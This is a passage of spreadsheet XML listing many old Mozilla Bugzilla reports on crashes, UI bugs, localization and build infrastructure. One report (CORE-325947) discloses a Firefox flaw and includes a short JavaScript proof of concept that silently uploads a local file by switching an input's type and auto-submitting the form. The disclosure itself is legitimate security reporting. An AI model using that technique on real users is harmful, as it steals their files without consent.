Line: 662
]]]
Expected Results:
No error. I think the correct recurrence summary should be Occurs every Wednesday the 1st effective .... If this is not possible display nothing.</t>
  </si>
  <si>
    <t>hubert+bmo</t>
  </si>
  <si>
    <t>THUNDERBIRD-239106</t>
  </si>
  <si>
    <t>Land Pinstripe for Thunderbird</t>
  </si>
  <si>
    <t>Kevin feel free to use this bug in your checkin comments for the pinstripe landing.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-356524</t>
  </si>
  <si>
    <t>[vi-VN] Vietnamese: Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
I've translated Firefox 1.5.0.7 to Vietnamese. So I would like register to localize Firefox. I can continue translating with next releases. I'm working with 2.0 RC2 now.
Reproducible: Always
Expected Results:  
Vietnamese versions</t>
  </si>
  <si>
    <t>jasperlotus</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-246938</t>
  </si>
  <si>
    <t>Javascript Menu Items Appear Overlapped</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040608
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040608
The javascript menu does not appear correctly.  It also appeared incorrectly in
Mozilla 1.7 RC2 release.
Reproducible: Always
Steps to Reproduce:
1.Go To URL listed and look at menu on left side of page
2.
3.
Actual Results:  
Javascript menu items are overlapping making the menu unusuable.
Expected Results:  
Each line of menu should appear on a seperate line not overlapped.  The menu
works fine in IE 6 and Opera 7.5
The menu is located in a frame - the actual URL for the javascript is at
http://www.tricare.osd.mil//GetTopics.cfm?ParentItemIDList=0173175180186189&amp;showmenu=173&amp;CategoryID=4</t>
  </si>
  <si>
    <t>elevatorsout</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-494220</t>
  </si>
  <si>
    <t>unit test reporting failure without reporting any diagnostic explaining why</t>
  </si>
  <si>
    <t>http://tinderbox.mozilla.org/showlog.cgi?log=Firefox3.5/1242921647.1242927642.4801.gz is a log of a unit test run that reported failure with no diagnostic that would suggest failure other than the TinderboxPrint: mochitest-plain T-FAIL.  There should be diagnostic output in the log explaining why the test failed.  The lack of such output makes the failure difficult to diagnose and is holding the tree closed right now although we'll probably sort that out somehow without this being fixed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-475015</t>
  </si>
  <si>
    <t>Would like to get a list of urls that a crash happens at</t>
  </si>
  <si>
    <t>We now appararently have breakpad data for a random crash we've been trying to hunt down on tinderbox.  See http://crash-stats.mozilla.com/report/list?product=Firefox&amp;branch=1.9.2&amp;version=Firefox%3A3.2a1pre&amp;query_search=signature&amp;query_type=contains&amp;query=&amp;date=&amp;range_value=7&amp;range_unit=days&amp;do_query=1&amp;signature=nsCSSFrameConstructor%3A%3AFindInputData%28nsIContent*%2C%20nsStyleContext*%29
Unfortunately the web UI doesn't show the URIs involved. Would it be possible to get them all so that I can try looping over them and seeing what happens?
If you can only get me a few URIs I guess I'd like the ones for http://crash-stats.mozilla.com/report/index/39371ebc-e31c-47d5-9cb7-db0402090123 and http://crash-stats.mozilla.com/report/index/bf11c658-610d-43dd-b6e8-db79c2090122</t>
  </si>
  <si>
    <t>CORE-422113</t>
  </si>
  <si>
    <t>EnsureLegalActivity crashes by opening Venkman</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Current 1.8 branch code base (10.03.2008) crashes always by opening Venkman in XPCNativeWrapper::EnsureLegalActivity () because missing check for script security manager pointer.
I have my own application based on 1.8 but I am pretty sure that this error is general and can be reproduced always.
EnsureLegalActivity was added recently and it does not check pointer returned by  GetAppropriateSecurityManager () - this pointer check is performed in other places.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>kayjay</t>
  </si>
  <si>
    <t>CORE-470072</t>
  </si>
  <si>
    <t>maximum age fixes</t>
  </si>
  <si>
    <t>some geolocation providers will not respond with a location for up to 1 minute.  In these cases we should provide an cached location if the timestamp is reasonable (&lt;30 seconds)</t>
  </si>
  <si>
    <t>MOZILLA_LABS-527260</t>
  </si>
  <si>
    <t>Patch to add restore minimized window functionality to JS-API</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.80 (Windows NT 6.0 U en) Presto/2.2.15 Version/10.01
Build Identifier: 
What? - this patch extends Prism's JavaScript API by the restoreWindow() function which will restore a window when minimized. It has no effect on a not minimized window.
Why? - A prism application minimized to tray has no possibility to wake itself up. This patch remedies that. This is particularly useful when used with callback-enabled notifications. (I'll post a patch soon.) The application can give the user a for instance a notification about new messages and the user can restore the window by clicking on the large notification text instead of the small tray icon.
How to test? - Add the following code to an application running Prism with this patch and minimize it right after starting it. It will restore itself 5 seconds later.
window.setTimeout(function() { window.platform.restoreWindow() } 5000)
Reproducible: Always</t>
  </si>
  <si>
    <t>johkra</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-464079</t>
  </si>
  <si>
    <t>Unittest steps throw exceptions after Buildbot master is reconfigured</t>
  </si>
  <si>
    <t>Today when http://staging-master.build.mozilla.org:8010 was reconfigured a couple of times all three platforms of unittest builds threw exceptions on their next step.  For linux this was in mochitest with the error:
Traceback (most recent call last):
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 185 in addCallbacks
    self._runCallbacks()
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 323 in _runCallbacks
    self.result = callback(self.result *args **kw)
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 242 in callback
    self._startRunCallbacks(result)
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 307 in _startRunCallbacks
    self._runCallbacks()
---  ---
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 323 in _runCallbacks
    self.result = callback(self.result *args **kw)
  File /tools/buildbot-079/lib/python2.5/site-packages/buildbot/process/buildstep.py line 972 in 
    d.addCallback(lambda res: self.evaluateCommand(cmd)) # returns results
  File /tools/buildbotcustom/buildbotcustom/unittest/steps.py line 328 in evaluateCommand
    superResult = ShellCommandReportTimeout.evaluateCommand(self cmd)
exceptions.TypeError: unbound method evaluateCommand() must be called with ShellCommandReportTimeout instance as first argument (got MozillaMochitest instance instead)
For Mac and Windows it was in the Check step with the error:
(view as text)
Traceback (most recent call last):
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 185 in addCallbacks
    self._runCallbacks()
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 323 in _runCallbacks
    self.result = callback(self.result *args **kw)
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 242 in callback
    self._startRunCallbacks(result)
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 307 in _startRunCallbacks
    self._runCallbacks()
---  ---
  File /tools/twisted-8.0.1/lib/python2.5/site-packages/twisted/internet/defer.py line 323 in _runCallbacks
    self.result = callback(self.result *args **kw)
  File /tools/buildbot-079/lib/python2.5/site-packages/buildbot/process/buildstep.py line 972 in 
    d.addCallback(lambda res: self.evaluateCommand(cmd)) # returns results
  File /tools/buildbotcustom/buildbotcustom/unittest/steps.py line 206 in evaluateCommand
    superResult = ShellCommandReportTimeout.evaluateCommand(self cmd)
exceptions.TypeError: unbound method evaluateCommand() must be called with ShellCommandReportTimeout instance as first argument (got MozillaCheck instance instead)
This will cause a lot of problems in the future when we want to have unittests mixed into production buildbot masters since they are reconfigured often and we don't want to have to close the tree.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-467332</t>
  </si>
  <si>
    <t>[sk] Add slovnik.sk as a new Firefox 3.1 search plugin</t>
  </si>
  <si>
    <t>Created attachment 350746
add slovnik.sk
We would like to add a new specific interest search plugin (language dictionary) into upcoming Firefox release.
This is our 8th search plugin current list:
&gt; google
&gt; azet-sk
&gt; atlas-sk
&gt; zoznam-sk
as generic search providers. Azet.sk Atlas.sk and Zoznam.sk are the top 3 most visited sites in Slovakia according to oficial Mediaresearch.sk monitoring with very similar visitor rates that's why all three are included.
&gt; dunaj-sk
&gt; eBay
as e-Commerce search
&gt; wikipedia-sk
as specific interest search
As you can see there's only one specific interest search plugin we decided to make user experience even better and figured out the language dictionary is a good candidate here.
The slovnik.sk site is offering several languages for use we decided to use english  slovak dictionary according to the data we requested from the slovnik.sk guys this language combination is used in 2/3 searches.
The plugin is designed to support both translation directions so you can enter either slovak or english term. The system is looking for the term in the English database first. If there's no such term it tries to find it in the sk database.
Contact:
Site: slovnik.sk
E-mail: reklama@slovnik.sk</t>
  </si>
  <si>
    <t>CORE-277553</t>
  </si>
  <si>
    <t>clicking on Textarea  with a  RTL  direction doesnt work</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Well 
the problem is with rtl textareas I am working with hebrew
when I click on the left side of the textarea after the end of the line the
text indicator should go to the end of that line that is working 
fine on the first line
BUT when I go down (pressing enter) and want to come back to the end of the line
of the above line.
exmpale: I want to go back from here to on the first line text mentioned
above but the indicator is stuck unless I go to the last character in that
line that is really making me insane sometimes when writing in a public forums
in Hebrew
I hope you will find a solution
Reproducible: Always
Steps to Reproduce:
1.go to a rtl textarea (or make it rtl by right clicking and selecting switch
text direction)
2. write some words
3. press enter
4. write some more words
5. click on the left side of the words you wrote in step no 2
Actual Results:  
Now you can see that the indicator is not going up
Expected Results:  
the text indicator was supose to go up like it does when the dir=ltr</t>
  </si>
  <si>
    <t>CORE-122787</t>
  </si>
  <si>
    <t>(nsIURI) nsStandardURL::SetFileName doesn't recalculate mPath</t>
  </si>
  <si>
    <t>For publishing I came across this interesting bug.
For publishing we create an nsIURI with an url that doesn't have the file
extension.  The extension is added later.  When the code calls
nsStandardURL::SetFileName to set the name with the extension everything is
reset except mPath which is left as the path without the extension.  During
publishing the HTTP put tries to GetPath but it doesn't get the whole path.
Regardless this seems like it could be a pretty serious problem (if someone
SetFileName to  or something less than what was there.
I have a fix in my own tree but I'm not an expert in this area so I'd like some
idea of the right approach (manually fix the mLen for mPath or call some other
method to do the recalculation).</t>
  </si>
  <si>
    <t>CORE-443106</t>
  </si>
  <si>
    <t>Circular dependency in makefile.ref</t>
  </si>
  <si>
    <t>Created attachment 327751
Patch to avoid circular dependency in the makefile.
The makefile for spidermonkey has a circular dependency. Some IDEs parse this warning as error (Eclipse) making it impossible to build SM from inside the gui. The attached patch fixes this issue.
make[1]: Circular jscpucfg.h &lt;- Darwin_DBG.OBJ/jsautocfg.h dependency dropped.
make[1]: Circular Darwin_DBG.OBJ/jsautocfg.h &lt;- Darwin_DBG.OBJ/jsautocfg.h dependency dropped.</t>
  </si>
  <si>
    <t>CORE-529910</t>
  </si>
  <si>
    <t>Crash when dragging and dropping or copying a too-large image [@ CGAccessSessionGetBytes ] or [@ alphaProviderGetBytes ]</t>
  </si>
  <si>
    <t>Not sure if this is OS X specific but it definitely happens on OS X.
Load the URL (an attachment from bug 289763). It (mostly) can't be displayed because it's too big. Now try to drag and drop it. Firefox crashes because something inside the drag and drop code assumes that we can always get a valid image surface (which isn't always the case like when the image is too big).
A null check should be inserted somewhere - I just don't know where that is.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-311593</t>
  </si>
  <si>
    <t>Merge or remove igor3@apochta.com account ?</t>
  </si>
  <si>
    <t>I do not have for some years access to account igor3@apochta.com . In fact the
domain apochta.com does not exis any longer for some years as well.
So I would like to ask if it is possible to merge the account with my account
igor.bukanov@gmail.com or at least disable or delete it so it would not be
possible to add it to CC lists or review requests? 
Unfortunately I do no have stronger proofs that igor3@apochta.com belongs to me
beyond the fact that it uses my name and related to similar products/components.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-218885</t>
  </si>
  <si>
    <t>crash in nsMsgFilter::MatchHdr with null folder</t>
  </si>
  <si>
    <t>I've seen a crash in nsMsgFilter::MatchHdr when the passed in folder was null. I
believe this was at shutdown. the upcoming bullet-proofing fix should take care
of this.</t>
  </si>
  <si>
    <t>CORE-324707</t>
  </si>
  <si>
    <t>Animated GIFs leave trails / don't erase in Cairo</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060125 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060125 Firefox/1.6a1
Some frames of some of the gifs in the URL given are black and white instead of being in color.
Reproducible: Always</t>
  </si>
  <si>
    <t>polidobj</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-435905</t>
  </si>
  <si>
    <t>move qm-centos5-03 to mozilla2 unittest</t>
  </si>
  <si>
    <t>As discussed in a meeting today we're going to try cloning qm-centos5-03 and installing it on mozilla2 unittest.
Steps to be done:
0. create cltbld user
1. upgrade python
2. upgrade twisted
3. upgrade buildbot
according to reference platform documents.
http://wiki.mozilla.org/ReferencePlatforms/Linux-CentOS-5.0
4. add builder to master config
5. create and connect slave</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-506181</t>
  </si>
  <si>
    <t>fennecmark breaks Tracemonkey non-Tp tests with illegal instruction</t>
  </si>
  <si>
    <t>I'm not sure if this is wanted.
But I noted the following behavior while setting up Talos on Tracemonkey builds (Tracemonkey + mobile-browser):
- Tp3 worked non-jit and broke with jit enabled same as m-c.
- all non-Tp tests broke with illegal instruction jit and non-jit.
I tried disabling fennecmark by removing tpan and tzoom and giving a different config file that didn't specify the tpan/chrome directory as a directory to copy to the fennec tree and non-Tp started working again (at least non-jit).
If this isn't wanted mark WONTFIX and we won't run Tpan and Tzoom on Tracemonkey builds.  If it is wanted we need to track down what is breaking.</t>
  </si>
  <si>
    <t>FIREFOX-427606</t>
  </si>
  <si>
    <t>bookmarking all tabs (to the personal toolbar maybe other locations) is slow I can hear the disk grind</t>
  </si>
  <si>
    <t>bookmarking all tabs (to the personal toolbar maybe other locations) is slow I can hear the disk grind
I have ten tabs open and I do Bookmarks | Bookmark All Tabs...
I choose Bookmarks Toolbar as the destination.
It takes a noticeably long time and I can hear the disk grinding.
do you guys see this too?
I'm using Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008040404 Minefield/3.0pre
I don't think this is a recent regression and my apologies if this is a duplicate.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-145545</t>
  </si>
  <si>
    <t>hotjobs.ca - cannot login with Mozilla</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.0+)
Gecko/20020512
BuildID:    2002051208
I realy don't know if this is Mozilla problem or the site problem. I can not
login to my account in this website. I get a popup window saying application
could not be found .... It works with IE.
Reproducible: Always
Steps to Reproduce:
1.just get an account (it is free) 
2.Try to log in with Mozilla.
3.
Actual Results:  popup window says login name is wrong
Expected Results:  you should be able to log in</t>
  </si>
  <si>
    <t>arjang</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-172104</t>
  </si>
  <si>
    <t>multiple subject headers causes different subject in thread pane than preview pane should use first subject</t>
  </si>
  <si>
    <t>I just received an email in which - for whatever reason - two subject lines
existed. The first was shown when the mail was selected (in the subject field)
the second (=last?) in the message-list-window and mozillanews-title display.</t>
  </si>
  <si>
    <t>juggy</t>
  </si>
  <si>
    <t>CORE-513291</t>
  </si>
  <si>
    <t>JSOP_INITPROP should insist obj has own scope (JSOP_NEWINIT knows to do this)</t>
  </si>
  <si>
    <t>See bug 471214 comment 68 et seq.
/be</t>
  </si>
  <si>
    <t>THUNDERBIRD-500123</t>
  </si>
  <si>
    <t>Mac: useless-ui print preview shouldn't be in the mac context menu &amp; the window title includes the app name</t>
  </si>
  <si>
    <t>As part of The Great War Against Use Of The Preprocessor bug 474701 replaced various bits of code that want to know if we're running on a Mac with gPlatformOSX (which jminta will eventually want to remove in his Battle Against Global Vars That Just Obfuscate How You Should Really Find Things Out For Yourself). That'd be fine I'm all for duelling Philosophies Of The One True Way To Write Code except gPlatformOSX is busted: it expects the first three characters of a mac window.navigator.oscpu to be mac but in fact the two Mac values for oscpu are (as assigned by the preprocessor :)) PPC Mac OS X and Intel Mac OS X. What we really want is (the preprocessor assigned) navigator.platform which will be either MacIntel or MacPPC (until something that doesn't think any in-tree code that could just be using the preprocessor will be grovelling through those strings and changes them).
Besides the ooh icky it's not Mac-native app name in the window title that also gives us a totally broken Print Preview item in the Mac context menu.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-278346</t>
  </si>
  <si>
    <t>Page source does not display properly if page is Big5 or Cyrillic encoded</t>
  </si>
  <si>
    <t>Well I found Camino seemed failed to show page source if the line contained
both chinese characters and HTML tags. For example page source of the site
http://www.oikos.com.tw/modules/news/ displayed inproperly if HTML tags and
chinese characters coexist in the same line. On the other hand other portions
which containd chinese characters are just right.</t>
  </si>
  <si>
    <t>yhlien2004</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-360726</t>
  </si>
  <si>
    <t>luna tinderbox is down</t>
  </si>
  <si>
    <t>The luna tinderbox has been down for a while now.    The log says:
  Gtk-WARNING **: cannot open display: :0.0</t>
  </si>
  <si>
    <t>MOZILLA.ORG-395133</t>
  </si>
  <si>
    <t>fix commit message mozilla/gfx/cairo/cairo/src/.cvsignore 1.2</t>
  </si>
  <si>
    <t>please fix the commit message for:
mozilla/gfx/cairo/cairo/src/.cvsignore 1.2
it was supposed to be part of this set:
Bug 341958 add some more items to .cvsignore
r=bsmedberg sr=pavlov</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-402906</t>
  </si>
  <si>
    <t>please add me to the canada-all mailing list</t>
  </si>
  <si>
    <t>See summary</t>
  </si>
  <si>
    <t>NSPR-17896</t>
  </si>
  <si>
    <t>New macro _PR_IS_GCABLE_THREAD(thread)</t>
  </si>
  <si>
    <t>This is my proposed solution to the problem that
all the threads on Mac OS need to be marked
GCable.
In the current code it is tricky to OR in the
_PR_GCABLE_THREAD flag for all threads without
introducing #ifdef XP_MAC at multiple places.
I propose that we add a new macro _PR_IS_GCABLE_THREAD
that is defined in primpl.h as follows:
    #ifdef XP_MAC
    #define _PR_IS_GCABLE_THREAD(thr) 1
    #else
    #define _PR_IS_GCABLE_THREAD(thr) ((thr)-&gt;flags &amp; _PR_GCABLE_THREAD)
    #endif /* XP_MAC */
and then replace all the occurrences of
    (thread-&gt;flags &amp; _PR_GCABLE_THREAD)
by
    _PR_IS_GCABLE_THREAD(thread)</t>
  </si>
  <si>
    <t>CORE-452632</t>
  </si>
  <si>
    <t>copyText/pasteText fails on html:input</t>
  </si>
  <si>
    <t>CORE-325947</t>
  </si>
  <si>
    <t>[FIX]Site can cause user's file to be uploaded by changing input type</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 da rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 da rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
If you make a file called 1.txt and place it on c:\ on a windows machine and then try the URL (http://www.vup.dk/test/changetype.php) the file will be uploaded without your approval.
This is indeed a high risc security issue. If you don't want to enter the url the JS code is this:
function changeType(obj) {
obj.type=text
obj.value=C:\\1.txt
obj.type=file
setTimeout(videre() 1)
}
function videre() {
	document.getElementById(submit).click()
}
Reproducible: Always
Steps to Reproduce:
1. Make a page and run the javascript and make as an example php show the output
Actual Results:  
File gets uploaded and content is printed
Expected Results:  
Denied the change of the input to .file</t>
  </si>
  <si>
    <t>thedeathart</t>
  </si>
  <si>
    <t>FIREFOX-423063</t>
  </si>
  <si>
    <t>Organize Bookmarks needs an ellipsis to convey that the action is not immediate</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-us) AppleWebKit/523.15.1 (KHTML like Gecko) Version/3.0.4 Safari/523.15
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X 10.5 en-US rv:1.9b5pre) Gecko/2008031404 Minefield/3.0b5pre
Show All Bookmarks menu item - opens a window - must have ellipsis
Show All Bookmarks opens a window titled Library - does not match the calling menu item
View _&gt; Sidebar _&gt; history results in a sidebar titled history not Library
Reproducible: Always
Steps to Reproduce:
1. visit 4 websites
2. in main menu select Bookmarks
3. in the pulldown menu select Show All Bookmarks - observe no ellipsis and title of window opened
4. in the main menu select view - navigate to Sidebar -&gt; history
5. observe the title of the resultant sidebar matches the calling menu - History
Actual Results:  
1 history adds 4 sites
2 window titled library opens
3 sidebar titled History opens
Expected Results:  
1. missing ellipsis is a known bug in Safari on MAC OS X
2. Window must say history
Add ellipsis to menu item
change Library to history</t>
  </si>
  <si>
    <t>uliss</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-480181</t>
  </si>
  <si>
    <t>Need 'editbugs' permission</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Build Identifier: 
I am getting review requests for abcasm bugs I need permission to edit the bugs to review them.  I am also going to start picking up some of the VM bug load so I'll need it to do that too.
Reproducible: Always
Steps to Reproduce:
Try to edit a bug e.g. review+ or assign it to me
Actual Results:  
Permissions error.
Expected Results:  
Action allowed.</t>
  </si>
  <si>
    <t>tharwood</t>
  </si>
  <si>
    <t>CORE-121266</t>
  </si>
  <si>
    <t>gtk2 needs window raising properly implemented</t>
  </si>
  <si>
    <t>gtk2 needs window raising implemented.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-267095</t>
  </si>
  <si>
    <t>Update Extension: Opine-It 1.1</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041026 Firefox/1.0RC1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041026 Firefox/1.0RC1
Small Update for Extension Opine-It. Fixes compat with FF 1.0
Extension: http://www.opine-it.com/downloads/opineit.xpi
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-270940</t>
  </si>
  <si>
    <t>apple.com - downloading a os x diskimage</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
if you download a diskimage a dialog box appears which says: you have choosen to
open xxx.dmg which is a binary file. What shoud Firefox do with this file? only
thing you can choos from is Save to Disc. Open with and Do this
automatically for files like this from now on are disabeld
Reproducible: Always
Steps to Reproduce:
1.http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty1.pl/product=05034&amp;platform=osx&amp;method=sa/dmm1.dmg
2.
3.
Actual Results:  
dialog where you can choos to download the discimage or cancle
Expected Results:  
it should download automatically (at least the second time)</t>
  </si>
  <si>
    <t>vivaldi</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-19304</t>
  </si>
  <si>
    <t>java dom api should be an xpcom module</t>
  </si>
  <si>
    <t>The Java DOM API is currently an xpcom component. It should become an xpcom
module for better xpcom compliance.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-458906</t>
  </si>
  <si>
    <t>Update MDC skin to revision 18892</t>
  </si>
  <si>
    <t>This adds some additional localization strings for Japanese.</t>
  </si>
  <si>
    <t>SEAMONKEY-758574</t>
  </si>
  <si>
    <t>Sync UI</t>
  </si>
  <si>
    <t>Port |Bug 662178 - Simplify timed callbacks| to SeaMonkey</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-268406</t>
  </si>
  <si>
    <t>Bad parameter name for french yahoo search plugin</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr-FR rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 fr-FR rv:1.7.5) Gecko/20041107 Firefox/1.0
The parameter with name ei should be ie.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-82089</t>
  </si>
  <si>
    <t>nsBidiUtilsImp::ArabicShaping should be turn on</t>
  </si>
  <si>
    <t>In intl/unicharutil/src/nsBidiUtilsImp.cpp
The function nsBidiUtilsImp::ArabicShaping is currently 
#ifdef FULL_ARABIC_SHAPING out. We need to turn that on.
This code is currently used by non bidi system to render arabic.
There are only one place call this function 
In layout/base/src/nsBidiPresUtils.cpp nsBidiPresUtils::FormatUnicodeText
I think this routine is more important than nsBidiUtilsImp::Conv_FE_06 
 nsBidiUtilsImp::Conv_FE_06_WithReverse and 
nsBidiUtilsImp::Conv_06_FE_WithReverse so I think we handle these cases
seperately will increase the speed of turn this one on.</t>
  </si>
  <si>
    <t>SEAMONKEY-312489</t>
  </si>
  <si>
    <t>URLs concatenated when opening a home page tab group from desktop icon</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20051012 SeaMonkey/1.0b
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20051012 SeaMonkey/1.0b
When Mozilla/Seamonkey is loaded and a new window is opened from the desktop
icon if a tab group is set as the home page the URLs will be concatenated in
the location bar.  Only one window is opened with no additional tabs. 
Subsequently the page loads fail due to the concatenated URLs (unless
about:blank is used).
Reproducible: Always
Steps to Reproduce:
1. set a group of tabs as the home page
2. open a new window via desktop icon
3. view the page load fail
Actual Results:  
New window opened with URLs concatenated no tabs open.  (eg
about:blankabout:blank or http://www.google.com/http://slashdot.org/ )
Expected Results:  
New window with several tabs open one site per tab (eg http://www.google.com/in
one tab http://slashdot.org/ in another).
currently using adblock d2 nightly build 52.  same results with adblock disabled
as well as enabled.</t>
  </si>
  <si>
    <t>sherman.s.wang</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-374686</t>
  </si>
  <si>
    <t>Need www.mozilla.com synched for locale-specific version changes</t>
  </si>
  <si>
    <t>Seems s/2.0.0.2/2.0.0.3/ wasn't done for the locale pages so they are still pointing to 2.0.0.2 instead of 2.0.0.3.
*sigh*
Please `svn update` www.mozilla.com to pick up these fixes.
The cache will need to be cleared once this is done.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-351963</t>
  </si>
  <si>
    <t>pt-PT / Portuguese</t>
  </si>
  <si>
    <t>Approval: Approval of adding search plugin for Portuguese Wikipedia</t>
  </si>
  <si>
    <t>From our discussions we'd like to add a search plugin for the portuguese wikipedia. This will complement Priberam's dictionary by providing an encyclopedia.</t>
  </si>
  <si>
    <t>joao.neves</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-318624</t>
  </si>
  <si>
    <t>xforms and schemaval need to be static for Minimo</t>
  </si>
  <si>
    <t>We need to make sure that XForms and Schemavalidation are static for Minimo builds.  dougt says that Minimo probably won't support components aside from possibly components written in JS or only using xpcom glue interfaces.  xpcom is not available as a .dll in Minimo and nspr and JS soon won't be either.</t>
  </si>
  <si>
    <t>BUGZILLA-496856</t>
  </si>
  <si>
    <t>Fix token.cgi transaction handling</t>
  </si>
  <si>
    <t>Created attachment 382092
Patch
token.cgi's transaction handling is slightly wrong:
 a) when changing an email we rederive the group list after the transaction has been committed
 b) There's no transaction when undoing that change
 c) The comment for (b) talks about this being racy 'given the lack of transactions' which is no longer true (although its still racy the db constraint will catch it and roll back)</t>
  </si>
  <si>
    <t>FIREFOX-397594</t>
  </si>
  <si>
    <t>On secure sites due to Larry autocomplete results won't align with what you've typed</t>
  </si>
  <si>
    <t>Created attachment 282347
screenshot
On secure sites autocomplete results won't align with what you've typed. That's quite confusing and also annoying.</t>
  </si>
  <si>
    <t>CORE-156888</t>
  </si>
  <si>
    <t>{inc} Issues changing display types with anonymous table cells</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 Q312461 .NET 
CLR 1.0.3705)
BuildID:    2002053012
When I toggle the style.display of a  object from none to inline or block 
it works correctly the first time. The second time it is toggled to be visible 
the  is moved over to the right the width of itself.
Every time after that it renders the same - to the right.
Please see the sample code in the additional information section of this 
report.
Reproducible: Always
Steps to Reproduce:
Run the HTML attached in the additional information section
1. Click the button 'Toggle Row 4'
2. Row 4 appears in the table
3. Click the button again
4. Row 4 disappears from the table
5. Click the button again
6. Row 4 appears in the table but moved over to the right - the    
   distance of its width.
&gt;
Actual Results:  The  horizontal position changed.
Expected Results:  Hide and shown the  in the same position every time.
		Row Test
		function toggleRow(rowId)
		{
			var r = document.getElementById(rowId)
			if (r.style.display == none)
				r.style.display = inline
			else
				r.style.display = none
